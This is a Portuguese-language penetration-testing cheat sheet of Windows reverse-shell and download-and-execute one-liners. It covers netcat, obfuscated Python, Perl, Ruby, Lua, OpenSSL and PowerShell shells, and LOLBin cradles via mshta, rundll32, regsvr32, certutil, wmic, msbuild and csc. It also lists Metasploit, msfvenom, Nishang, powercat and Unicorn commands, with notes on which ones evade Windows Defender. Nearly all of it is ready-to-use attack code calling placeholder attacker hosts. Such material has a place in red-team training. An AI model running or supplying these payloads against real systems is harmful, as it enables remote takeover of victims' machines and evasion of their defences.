# Shells - Windows
## Lolbas
A página [lolbas-project.github.io](https://lolbas-project.github.io/) é para Windows assim como [https://gtfobins.github.io/](https://gtfobins.github.io/) é para linux.\
Obviamente, **não existem arquivos SUID ou privilégios sudo no Windows**, mas é útil saber **como** alguns **binários** podem ser (mal)usados para realizar algum tipo de ações inesperadas como **executar código arbitrário.**
## NC
nc.exe -e cmd.exe <Attacker_IP> <PORT>
## SBD
**[sbd](https://www.kali.org/tools/sbd/) é uma alternativa portátil e segura ao Netcat**. Funciona em sistemas semelhantes ao Unix e Win32. Com recursos como criptografia forte, execução de programas, portas de origem personalizáveis e reconexão contínua, o sbd oferece uma solução versátil para comunicação TCP/IP. Para usuários do Windows, a versão sbd.exe da distribuição Kali Linux pode ser usada como uma substituição confiável para o Netcat.
# Victims machine
sbd -l -p 4444 -e bash -v -n
listening on port 4444
# Atackers
sbd 4444
uid=0(root) gid=0(root) groups=0(root)
## Python
C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"
## Perl
Perl is a high-level, general-purpose programming language that is commonly used for scripting and system administration tasks. It is known for its powerful text processing capabilities and is often used for creating shell scripts on Windows systems. Perl scripts can be executed on Windows using the Perl interpreter, which needs to be installed on the system.
perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
## Ruby
ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
## Lua
lua5.1 -e 'local host, port = "", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
## OpenSSH
Atacante (Kali)
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port> #Here you will be able to introduce the commands
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port2> #Here yo will be able to get the response
openssl s_client -quiet -connect <ATTACKER_IP>:<PORT1>|/bin/bash|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>
openssl.exe s_client -quiet -connect <ATTACKER_IP>:<PORT1>|cmd.exe|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>
## Powershell
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('')|iex"
powershell "IEX(New-Object Net.WebClient).downloadString('')"
Start-Process -NoNewWindow powershell "IEX(New-Object Net.WebClient).downloadString('')"
echo IEX(New-Object Net.WebClient).DownloadString('') | powershell -noprofile
Processo realizando chamada de rede: **powershell.exe**\
Carga gravada no disco: **NÃO** (_pelo menos em nenhum lugar que eu pudesse encontrar usando o procmon!_)
powershell -exec bypass -f \\webdavserver\folder\payload.ps1
Processo realizando chamada de rede: **svchost.exe**\
Carga gravada no disco: **cache local do cliente WebDAV**
**Em uma linha:**
$client = New-Object System.Net.Sockets.TCPClient("",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
**Obtenha mais informações sobre diferentes Shells do Powershell no final deste documento**
## Mshta
* [A partir daqui](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))
mshta http://webserver/payload.hta
mshta \\webdavserver\folder\payload.hta
#### **Exemplo de shell reverso hta-psh (usar hta para baixar e executar backdoor PS)**
<scRipt language="VBscRipT">CreateObject("WscrIpt.SheLL").Run "powershell -ep bypass -w hidden IEX (New-ObjEct System.Net.Webclient).DownloadString('')"</scRipt>
**Você pode baixar e executar muito facilmente um zombie Koadic usando o stager hta**
#### Exemplo hta
<script language="jscript">
var c = "cmd.exe /c calc.exe";
new ActiveXObject('WScript.Shell').Run(c);
#### **mshta - sct**
<?XML version="1.0"?>
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:C:\local\path\scriptlet.sct"")")) -->
<script language="JScript">
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
#### **Mshta - Metasploit**
use exploit/windows/misc/hta_server
msf exploit(windows/misc/hta_server) > set srvhost
msf exploit(windows/misc/hta_server) > set lhost
msf exploit(windows/misc/hta_server) > exploit
Victim> mshta.exe // #The file name is given in the output of metasploit
**Detectado pelo defensor**
## **Rundll32**
[**Exemplo de Dll hello world**](https://github.com/carterjones/hello-world-dll)
* [Daqui](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
rundll32 \\webdavserver\folder\payload.dll,entrypoint
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();
**Detectado pelo defensor**
**Rundll32 - sct**
<?XML version="1.0"?>
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
<script language="JScript">
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
#### **Rundll32 - Metasploit**
use windows/smb/smb_delivery
#You will be given the command to run in the victim: rundll32.exe \\\Iwvc\test.dll,0
**Rundll32 - Koadic**
use stager/js/rundll32_js
set ENDPOINT sales
#Koadic will tell you what you need to execute inside the victim, it will be something like:
rundll32.exe javascript:"\..\mshtml, RunHTMLApplication ";x=new%20ActiveXObject("Msxml2.ServerXMLHTTP.6.0");x.open("GET","",false);x.send();eval(x.responseText);window.close();
## Regsvr32
* [A partir daqui](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll
**Detectado pelo defensor**
#### Regsvr32 -sct
<?XML version="1.0"?>
<!-- regsvr32 /u /n /s /i:http://webserver/regsvr32.sct scrobj.dll -->
<!-- regsvr32 /u /n /s /i:\\webdavserver\folder\regsvr32.sct scrobj.dll -->
classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
<script language="JScript">
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
#### **Regsvr32 - Metasploit**
use multi/script/web_delivery
set target 3
set payload windows/meterpreter/reverse/tcp
set lhost
#You will be given the command to run in the victim: regsvr32 /s /n /u /i: scrobj.dll
**Você pode baixar e executar facilmente um zombie Koadic usando o stager regsvr**
## Certutil
* [Daqui](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
Baixe um B64dll, decodifique e execute.
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll
Baixe um B64exe, decodifique e execute-o.
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe
**Detectado pelo defensor**
## **Cscript/Wscript**
powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('',\"$env:temp\test.vbs\");Start-Process %windir%\system32\cscript.exe \"$env:temp\test.vbs\""
**Cscript - Metasploit**
msfvenom -p cmd/windows/reverse_powershell lhost= lport=4444 -f vbs > shell.vbs
**Detectado pelo defensor**
## PS-Bat
Processo realizando chamada de rede: **svchost.exe**\
Carga gravada no disco: **cache local do cliente WebDAV**
msfvenom -p cmd/windows/reverse_powershell lhost= lport=4444 > shell.bat
impacket-smbserver -smb2support kali `pwd`
**Detectado pelo defensor**
## **MSIExec**
msfvenom -p windows/meterpreter/reverse_tcp lhost= lport=1234 -f msi > shell.msi
python -m SimpleHTTPServer 80
victim> msiexec /quiet /i \\\kali\shell.msi
## **Wmic**
* [A partir daqui](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
wmic os get /format:"https://webserver/payload.xsl"
Exemplo de arquivo xsl [daqui](https://gist.github.com/Arno0x/fa7eb036f6f45333be2d6d2fd075d6a7):
<?xml version='1.0'?>
<stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="placeholder" version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c echo IEX(New-Object Net.WebClient).DownloadString('') | powershell -noprofile -");
**Não detectado**
**Você pode baixar e executar muito facilmente um zumbi Koadic usando o stager wmic**
## Msbuild
* [Daqui](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"
Pode usar esta técnica para contornar a Lista Branca de Aplicações e restrições do Powershell.exe. Como resultado, será solicitado um shell PS.\
Basta baixar e executar o seguinte: [https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj](https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj)
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildShell.csproj
**Não detectado**
## **CSC**
Compilar código C# na máquina da vítima.
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:shell.exe shell.cs
Pode baixar um shell reverso básico em C# aqui: [https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc](https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc)
**Não detectado**
## **Regasm/Regsvc**
* [Daqui](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll
**Eu não tentei**
## Odbcconf
* [Daqui](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}
**Eu não tentei**
## Shells do Powershell
### PS-Nishang
Na pasta **Shells**, existem muitas shells diferentes. Para baixar e executar o Invoke-_PowerShellTcp.ps1_ faça uma cópia do script e adicione ao final do arquivo:
Invoke-PowerShellTcp -Reverse -IPAddress -Port 4444
Comece a servir o script em um servidor web e execute-o no final da vítima:
powershell -exec bypass -c "iwr('')|iex"
Defender ainda não o detecta como código malicioso (até 3/04/2019).
**TODO: Verificar outros shells do nishang**
### **PS-Powercat**
Baixe, inicie um servidor web, inicie o ouvinte e execute no final da vítima:
powershell -exec bypass -c "iwr('')|iex;powercat -c -p 4444 -e cmd"
Defender ainda não o detecta como código malicioso (ainda, 3/04/2019).
**Outras opções oferecidas pelo powercat:**
Conexão de shells, Shell reverso (TCP, UDP, DNS), Redirecionamento de porta, upload/download, Gerar payloads, Servir arquivos...
Serve a cmd Shell:
powercat -l -p 443 -e cmd
Send a cmd Shell:
powercat -c -p 443 -e cmd
Send a powershell:
powercat -c -p 443 -ep
Send a powershell UDP:
powercat -c -p 443 -ep -u
TCP Listener to TCP Client Relay:
powercat -l -p 8000 -r tcp:
Generate a reverse tcp payload which connects back to port 443:
powercat -c -p 443 -e cmd -g
Start A Persistent Server That Serves a File:
powercat -l -p 443 -i C:\inputfile -rep
### Empire
Crie um iniciador powershell, salve-o em um arquivo e faça o download e execute-o.
powershell -exec bypass -c "iwr('')|iex;powercat -c -p 4444 -e cmd"
**Detectado como código malicioso**
### MSF-Unicorn
Crie uma versão em powershell de uma backdoor do metasploit usando o unicorn
python unicorn.py windows/meterpreter/reverse_https 443
Inicie o msfconsole com o recurso criado:
msfconsole -r unicorn.rc
Inicie um servidor web servindo o arquivo _powershell\_attack.txt_ e execute no alvo:
powershell -exec bypass -c "iwr('')|iex"
**Detectado como código malicioso**
## Mais
[PS>Attack](https://github.com/jaredhaight/PSAttack) Console PS com alguns módulos ofensivos PS pré-carregados (cifrado)\
WinPWN](https://github.com/SecureThisShit/WinPwn) Console PS com alguns módulos ofensivos PS e detecção de proxy (IEX)
## Referências
* [https://highon.coffee/blog/reverse-shell-cheat-sheet/](https://highon.coffee/blog/reverse-shell-cheat-sheet/)
* [https://gist.github.com/Arno0x](https://gist.github.com/Arno0x)
* [https://github.com/GreatSCT/GreatSCT](https://github.com/GreatSCT/GreatSCT)
* [https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/](https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/)
* [https://www.hackingarticles.in/koadic-com-command-control-framework/](https://www.hackingarticles.in/koadic-com-command-control-framework/)
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)
* [https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
